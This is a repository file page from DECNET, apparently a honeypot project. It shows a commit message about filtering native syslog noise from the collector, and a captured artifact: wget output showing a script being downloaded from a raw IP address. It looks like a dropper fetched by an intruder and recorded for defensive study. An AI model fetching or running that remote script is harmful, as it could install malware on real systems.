DECNET/artifacts/wget.sh at f4fe6fe6e49825dac5888afdc0cfd3e566f48921 - DECNET - RESACA Chile: Donde la ciberseguridad se chupa una chela.

anti/DECNET

Files

anti 88f276e9e7 feat(collector): drop native unix daemon syslog from ingestion

sshd, pam_unix, sudo, CRON, systemd, kernel, rsyslogd, and dbus-daemon
all share the SSH/telnet decky containers and write to the same syslog
socket as DECNET's own emitters. Their output was being parsed and
ingested into the JSON stream, the dashboard, and the profiler — pure
noise: sshd's "Failed password for root from X" duplicates the
auth-helper's structured auth_attempt event, pam_unix repeats it again,
CRON/systemd say nothing about attacker behavior.

Drop these APP-NAMEs in _should_ingest before the JSON write and bus
publish. Raw .log file still captures everything for forensics. The
denylist is overridable with DECNET_COLLECTOR_DROP_APPS so operators
can extend it without code changes.

2026-04-28 19:21:39 -04:00

4 lines

120 B

Bash

Raw Blame History

	`[0] Downloading 'http://31.56.209.39/wget.sh' ...`
	`Saving 'wget.sh.1'`
	`HTTP response 200 OK [http://31.56.209.39/wget.sh]`